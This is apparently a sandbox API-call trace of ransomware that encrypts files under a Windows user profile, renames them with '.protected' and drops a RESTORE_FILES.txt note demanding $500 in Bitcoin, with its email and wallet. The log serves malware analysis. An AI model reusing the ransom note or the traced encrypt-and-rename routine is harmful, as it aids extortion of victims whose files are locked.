pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected") returned 114 [0094.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.protected")) returned 1 [0094.104] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0094.104] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0094.104] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt") returned 105 [0094.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.105] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.105] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0094.106] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.106] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.106] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.106] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0094.106] CloseHandle (hObject=0x154) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0094.106] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0094.106] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt") returned 96 [0094.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.107] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.107] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0094.108] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.108] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0094.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.108] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0094.108] CloseHandle (hObject=0x150) returned 1 [0094.108] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.108] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.108] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt") returned 90 [0094.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.109] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.109] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.110] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.110] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.110] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.110] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.110] CloseHandle (hObject=0x14c) returned 1 [0094.111] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.111] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 75 [0094.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.112] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.112] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.113] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.113] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.113] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.113] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.113] CloseHandle (hObject=0xd8) returned 1 [0094.113] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.113] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0094.113] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Windows") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files (x86)") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="$Recycle.bin") returned 1 [0094.113] lstrcmpiW (lpString1="Windows Mail", lpString2="System Volume Information") returned 1 [0094.113] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned 57 [0094.113] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0094.113] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0094.113] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned 59 [0094.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\.") returned 59 [0094.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.124] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\..") returned 60 [0094.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.124] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Windows") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.124] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="System Volume Information") returned -1 [0094.124] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.124] StrStrIW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".protected") returned 0x0 [0094.124] lstrcmpW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.125] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.125] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.125] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0094.126] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.126] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".rar") returned 0x0 [0094.126] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0094.126] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".zip") returned 0x0 [0094.126] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.162] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.163] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.163] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.163] CloseHandle (hObject=0x14c) returned 1 [0094.163] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected") returned 123 [0094.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.protected")) returned 1 [0094.164] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Windows") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.164] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.165] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="System Volume Information") returned -1 [0094.165] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.165] StrStrIW 